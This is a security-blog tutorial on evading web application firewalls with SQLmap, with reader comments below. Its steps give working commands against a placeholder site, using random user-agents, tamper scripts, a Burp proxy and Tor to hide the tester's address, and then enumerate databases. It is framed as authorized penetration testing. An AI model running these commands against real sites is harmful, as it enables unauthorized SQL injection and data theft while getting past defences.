DevDigest

Bypassing Web Application Firewalls (WAF) Using SQLmap

Learn how to bypass WAF effectively using SQLmap with practical examples. Explore SQL injection evasion techniques and enhance your penetration testing skills.

Tags: , , , , , , , , , , , , , ,

Web Application Firewalls (WAF) play a critical role in blocking malicious traffic and protecting web applications from SQL injection attacks. However, WAFs aren’t foolproof—understanding their limitations allows penetration testers to bypass them using advanced tools and techniques. SQLmap, a popular SQL injection tool, provides built-in features to evade WAF detection by using payload obfuscation, tamper scripts, header modifications, and proxy networks.

This article will demonstrate several methods for bypassing WAF using SQLmap with step-by-step examples, practical command outputs, and detailed explanations. Whether you’re conducting security assessments or expanding your ethical hacking skills, this guide will help you understand how to navigate WAF restrictions effectively.

Table of Contents

Prerequisites

Before starting, make sure you have:

  • Termux installed: Download Termux.
  • SQLmap installed: Install with:bashCopy codepkg install python pip install sqlmap
  • A target web application: Ensure you have permission to test the system.
  • Proxy tool (e.g., Burp Suite): For analyzing blocked requests.
  • Optional: Tor Network: Configure Tor for anonymous SQLmap testing.

Bypassing WAF with SQLmap: Step-by-Step

Step 1: Initial SQL Injection Test

Begin by checking if the target is vulnerable to SQL injection.

Command:

sqlmap -u "http://target.com/page?id=1"

Sample Output:

[21:01:15] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS  
[21:01:15] [WARNING] WAF detected! Request blocked.  
[21:01:16] [ERROR] all tested parameters appear to be not injectable.

Explanation:
This output shows that the request was blocked by the WAF. SQLmap detected that the target is protected, meaning you need to use advanced techniques to bypass the WAF.

Step 2: Using SQLmap to Bypass WAF

1. Random User-Agent Header

Some WAFs block requests based on the User-Agent string. Use SQLmap’s --random-agent option to evade this.

Command:

sqlmap -u "http://target.com/page?id=1" --random-agent

Sample Output:

[21:05:23] [INFO] using a randomly selected HTTP User-Agent  
[21:05:24] [INFO] GET parameter 'id' appears to be injectable.  
[21:05:25] [INFO] available databases:
[*] target_db

Explanation:
Using a random User-Agent header tricked the WAF, allowing SQLmap to proceed with the injection.

2. Tamper Scripts for Obfuscation

SQLmap offers tamper scripts that modify payloads to bypass WAF rules. For example, the between script introduces encoded elements to evade detection.

Command:

sqlmap -u "http://target.com/page?id=1" --tamper=between

Sample Output:

[21:10:16] [INFO] GET parameter 'id' appears to be injectable.  
[21:10:17] [INFO] fetched data:  
Database: target_db  
[1 table found]  
+-------+  
| users |  
+-------+

Explanation:
The tamper script successfully encoded the payload, bypassing the WAF and retrieving data.

3. Hex Encoding Payloads

Hex encoding transforms SQL queries into hexadecimal format, confusing WAFs that don’t decode payloads.

Command:

sqlmap -u "http://target.com/page?id=1" --tamper=hexencode

Sample Output:

[21:15:43] [INFO] GET parameter 'id' appears to be injectable.  
Database: target_db  
[2 tables found]  
+---------+  
| users   |  
| orders  |  
+---------+

Explanation:
By sending hex-encoded payloads, SQLmap bypassed the WAF filters and extracted data from the database.

4. Case Manipulation to Evade WAF

Some WAFs rely on case-sensitive keyword detection. SQLmap offers case manipulation options through tamper scripts.

Command:

sqlmap -u "http://target.com/page?id=1" --tamper=uppercase

Sample Output:

[21:20:12] [INFO] found database: target_db

Explanation:
The WAF’s filtering rules didn’t account for case changes, allowing the payload to bypass detection.

Step 3: SQLmap with Proxy Tools for WAF Analysis

Use a proxy such as Burp Suite to inspect blocked requests and adjust SQLmap payloads accordingly.

Command:

sqlmap -u "http://target.com/page?id=1" --proxy="http://127.0.0.1:8080"

Sample Output:

[21:25:46] [INFO] routing traffic through http://127.0.0.1:8080  
[21:25:50] [INFO] GET parameter 'id' appears to be injectable.

Explanation:
A proxy helps you analyze the WAF’s behavior and fine-tune your SQLmap commands for better evasion.

Step 4: Anonymizing SQLmap Requests with Tor

To avoid IP-based blocking by WAFs, route SQLmap traffic through the Tor network.

Command:

sqlmap -u "http://target.com/page?id=1" --tor --tor-type=SOCKS5 --check-tor

Sample Output:

[21:30:33] [INFO] Tor connection confirmed  
[21:30:35] [INFO] GET parameter 'id' appears to be injectable.

Explanation:
Using Tor hides your real IP address and helps bypass IP-based WAF restrictions.

Step 5: Extracting Data After Bypassing WAF

Once the WAF is bypassed, you can extract data from the database using SQLmap.

Command:

sqlmap -u "http://target.com/page?id=1" --dbs

Sample Output:

[21:35:10] [INFO] available databases:  
[*] information_schema  
[*] target_db

Conclusion

Bypassing WAFs with SQLmap requires strategic use of random agents, tamper scripts, and encoding techniques. Analyzing blocked requests through proxies and using Tor for anonymity further improves your chances of evading WAFs. Mastering these methods will enhance your penetration testing abilities, but always remember to use them responsibly and with authorization.

Disclaimer

This article is for educational purposes only. Unauthorized use of these techniques is illegal and can result in severe penalties. Always ensure that you have permission before testing any web application.

Leave a Reply

Your email address will not be published. Required fields are marked *

Comments (

)

  1. Orosco

    you will have an awesome weblog right here! would you prefer to make some invite posts on my blog?

    Reply
    1. Sam Galope

      Thank you for the compliment! I’d be happy to collaborate and contribute some guest posts to your blog. Feel free to reach out to me via email at devdigest@samgalope.dev, and we can discuss ideas further!

      Reply
  2. Chirsco

    Thanks for this wonderful article.

    Reply
    1. Sam Galope

      Glad you found it helpful! Thanks for reading, and feel free to check out more articles on the site. Let me know if you have any questions!

      Reply
  3. Meador

    My spouse and I absolutely love your blog and find many of your post’s to be just what I’m looking for. can you offer guest writers to write content available for you? I wouldn’t mind producing a post or elaborating on a lot of the subjects you write regarding here. Again, awesome weblog!

    Reply
    1. Sam Galope

      Thank you so much for the kind words! I’m thrilled that you and your spouse enjoy the blog. We do consider guest writers, and I’d be happy to discuss potential collaboration opportunities. Feel free to check out our subscription page here for updates, and let me know if you’d like to talk more about contributing!

      Reply
  4. Snively

    Hi would you mind letting me know which hosting company you’re utilizing? I’ve loaded your blog in 3 completely different web browsers and I must say this blog loads a lot faster then most. Can you recommend a good internet hosting provider at a reasonable price? Cheers, I appreciate it!

    Reply
    1. Sam Galope

      Thanks for noticing! A fast-loading site makes all the difference. I use Hostinger for hosting, and it’s been reliable, affordable, and performance-driven.

      If you’re looking for a great hosting provider at a reasonable price, I highly recommend checking them out:

      Get started with Hostinger here.

      Hope that helps, and happy blogging! 🚀

      Reply
  5. Carmack

    Great beat ! I would like to apprentice while you amend your web site, how could i subscribe for a blog site? The account helped me a acceptable deal. I had been a little bit acquainted of this your broadcast provided bright clear concept

    Reply
    1. Sam Galope

      Thank you! 😊 I’m glad you found the post helpful. SQLmap is a powerful tool, and understanding how Web Application Firewalls (WAFs) work is essential for ethical security testing. In an upcoming post, I’ll cover techniques for bypassing WAFs responsibly, legal considerations, and best practices for penetration testing.

      If you’d like to stay updated with new posts, you can subscribe to the blog—let me know, and I’ll share the details! 🚀

      Meanwhile, feel free to check out more WAF content here:
      Ethical Hacking Archives.

      Happy learning, and stay ethical! 🔐😊

      Reply
  6. Gerwig

    Thank you for sharing this article with me. It helped me a lot and I love it.

    Reply
    1. Sam Galope

      Glad you found it helpful! 😊 Always remember to use security tools like SQLmap responsibly for ethical security testing and vulnerability assessments. If you’re into cybersecurity, you might enjoy exploring more topics in open-source security!

      Check out this guide as well:
      How to Monitor Soil Moisture Levels with an ESP32 and Soil Moisture Sensor using MicroPython

      Thanks for reading, and stay secure! 🔒🚀

      Reply
  7. Anderon

    You’ve been great to me. Thank you!

    Reply
    1. Sam Galope

      I’m really glad you found the article helpful! 😊 Bypassing Web Application Firewalls (WAF) with SQLmap is a fascinating topic, especially when exploring different evasion techniques.

      Also, you might enjoy this related read:
      👉 Mouse Jiggler Reddit Debate: Why Remote Workers Use Them.

      Thanks for reading and supporting the blog! 🚀

      Reply